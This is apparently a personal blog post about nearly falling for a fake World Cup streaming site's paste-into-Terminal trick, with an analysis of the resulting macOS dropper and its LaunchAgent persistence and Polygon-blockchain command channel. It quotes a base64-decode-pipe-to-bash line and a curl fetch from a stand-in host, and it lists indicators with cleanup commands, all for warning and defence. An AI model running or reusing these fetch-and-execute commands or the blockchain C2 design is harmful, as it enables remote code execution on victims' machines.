I almost got hacked today. I was looking for a free online stream of the FIFA World Cup 2026, found a shady website, and did exactly what it told me to do. In my defense, kickoff was soon.
How it started
The site claimed to stream the World Cup for free and walked me through four steps:
- Press
cmd+space - Type
terminaland pressenter - Press
cmd+Vto paste (no mention of when anything was copied to my clipboard) - Press
enter
Any rational person would have stopped. I didn't — I was too eager to watch the match to think clearly.
What I pasted
The clipboard held something like:
bash "echo "<some short base64 string>" | base64 -d | bash"
I pasted it and pressed enter. macOS immediately flagged it as malware and blocked it.
No harm was done to my system.
That's when I learned about XProtect — Apple's built-in anti-malware system. It keeps a signature list of known malicious scripts and blocks matches before they run. This one was already in the database, which is the only reason nothing bad happened.
Going down the rabbit hole
By then I had completely forgotten about the World Cup.
I ran history to recover the command. Nothing — the script never executed,
so there was nothing to find.
Decoding the base64 manually gave me something like this (the link is fake here, but it's real in the actual script):
curl -fsSL https://example.com/malware.sh
I fetched the script without executing it:
curl -fsSL https://example.com/malware.sh | cat
The output was an osascript command wrapping another large base64 payload.
Claude declined to analyze it, citing security policy. ChatGPT did. Here's what it found.
What the malware does
A multi-stage macOS dropper: AppleScript, persistent LaunchAgent, and the Polygon blockchain as a command-delivery channel.
Stage 1 — Persistence. Creates
~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist and registers it with
launchctl. The plist sets RunAtLoad (runs at login) and
KeepAlive (relaunches if killed).
Stage 2 — Obfuscated payload. The LaunchAgent runs
echo '<base64>' | base64 -d | osascript. The AppleScript rebuilds strings
character by character — (character id 112) & (ASCII character 111) & ...
— to evade static analysis.
Stage 3 — Blockchain C2. The script hits Polygon RPC endpoints
(polygon.drpc.org, polygon.publicnode.com,
polygon-mainnet.gateway.tatum.io, tenderly.rpc.polygon.community),
trying each in sequence. It sends a JSON-RPC eth_call to a hard-coded smart contract,
extracts the hex result (0x...), decodes it to text, and pipes it into
osascript:
Polygon RPC → eth_call → hex response → decode → osascript → execute
The attacker can change behavior anytime by updating what the contract returns — no traditional C2 server, and the on-disk payload never needs updating.
Verdict: persistent macOS backdoor with remote code execution, using Polygon RPC as command transport. High severity. The blockchain layer delivers attacker commands, not just wallet reconnaissance.
If you ran this script
Look for these:
ls ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
ls ~/Library/ifipbqmfnnywqguz
launchctl list | grep ifipbqmfnnywqguz
If you find them, do this:
launchctl unload ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
rm ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
Also check for similarly named random directories under ~/Library/.
What I took away
Simple social engineering — urgency plus a plausible streaming site — almost worked on someone who knows what a terminal is.
- Don't paste commands into Terminal because a website told you to.
base64 -d | bashis almost never something a legitimate site needs you to run.- XProtect helped, but it only covers known signatures. New variants can slip through.
Glad the script was blocked, glad I understood what it would have done, and glad I can share this from an uncompromised laptop. Shoutout to Apple for protecting me from myself, and to ChatGPT for analyzing the script.
Now I'm going to watch the World Cup the legal way.
Until next time!